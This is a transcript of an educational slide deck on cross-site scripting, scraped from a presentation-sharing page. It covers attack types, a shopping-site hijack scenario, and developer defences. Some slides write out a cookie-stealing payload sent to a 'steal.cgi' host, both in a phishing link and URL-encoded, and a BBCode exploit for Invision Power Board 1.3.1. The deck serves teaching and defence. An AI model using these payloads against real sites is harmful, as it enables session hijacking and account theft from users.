Presentation is loading. Please wait.

Presentation is loading. Please wait.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Published byLewis Simmons Modified over 9 years ago

Similar presentations

Presentation on theme: "Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse."— Presentation transcript:

1 Cross Site Scripting a.k.a. XSS Szymon Siewior

2 Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse these materials in any way you wish, but you are held responsible for any damage caused in result of using code/method/actions.

3 What are XSS Attacks? XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code. What harm could this cause? Websites that are vulnerable to XSS attacks are running some sort of Dynamic Content. – Forums – Web Based Email – Places where information is submitted

4 Script Injection & XSS There are two types of XSS, one being Script Injection and one being your general XSS attack, an XSS attack is normally used to execute java script in order to steal someone's identity however it can be and sometimes is used to alter a page temporarily, a script injection permanently alters the webpage, it is important not to get the two confused, both vulnerabilities can be just as dangerous as each other and it is important if you are a vendor to protect your software from being vulnerable to them.

5 What can attackers do with CSS? Account hijacking (Cookie Theft) Execution of code on the users computer (Client side)

6 Attack Scenario Victim: is on an online shopping site Has 1-Click Ordering set-up Attacker knows that when he will capture the victim’s cookie, he will be able to purchase products using the victim’s account The attacker finds that there is an XSS vulnerability in the web application software that the shopping website uses, he sends the victim and email, with the following HTML: document.location.replace('http://fre ewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out!

7 Attack Scenario (cont…) The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has the users cookie. Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself.

8 Hunting down vulnerable sites If you are a website developer you may think, well my website does not hold any important information (if this is the case) however it is using web application software, why would I need to worry about attackers? “Script Kiddies”. After a quick search of Google I was able to find, that Invision Power Board 1.3.1 Final is vulnerable to XSS, it is important to note if you do not already know that IPB is a very popular web forum software. Exploit: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javas cript:document.location.replace('http://hackerlounge.com');") [/color] The exploit simply redirects the victim to another website, however if one were to alter the exploit (which doesn't take much skill) it could very easily be used for stealing cookies. Other vulnerable applications: – PHP Nuke – PHPBB

9 Encoding attack URLs Tool: http://ostermiller.org/calc/encode.htmlhttp://ostermiller.org/calc/encode.html Before: – http://localhost/nuke73/modules.php?name=News&f ile=article&sid=1&optionbox=[‘http://freewebhost.co m/ph33r/steal.cgi?'+document.cookie] After: – http://localhost/nuke73/modules.php%3Fname%3DN ews%26file%3Darticle%26sid%3D1%26optionbox%3D %5B%27http%3A//freewebhost.com/ph33r/steal.cgi% 3F%27%2Bdocument.cookie%5D

10 How can I protect myself? There is no way of protecting yourself against XSS attacks. Common myth about XSS is that SSL will protect you from an XSS attack, this is not true. Be wary of links that are sent to you in an email, or posted in on the forum (or something similar) Set browser security settings to high and/or disable Java Script, Java, Flash, VBScript and ActiveX

11 What can I the developer do? Filter characters which are sent to the web application – > < ( ) [ ] ‘ “ ; : / \ Convert all characters which are not letters or numbers to their HTML equivalents before displaying the user input in search scripts and forums. ( < to < ) Make sure that the pages in the Web site or web application return user inputs only after checking them for any potentially malicious code. Check the referrer to the login page If you have an existing site, check it: – alert('Vulnerable')

12 Conclusion Learn about XSS The lack of knowledge about XSS is what makes it so dangerous

13 THE END!!

Download ppt "Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.

Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Server-Side vs. Client-Side Scripting Languages

Server-Side vs. Client-Side Scripting Languages
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.
Website Development with PHP and MySQL Introduction.

Website Development with PHP and MySQL Introduction.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Similar presentations

Ads by Google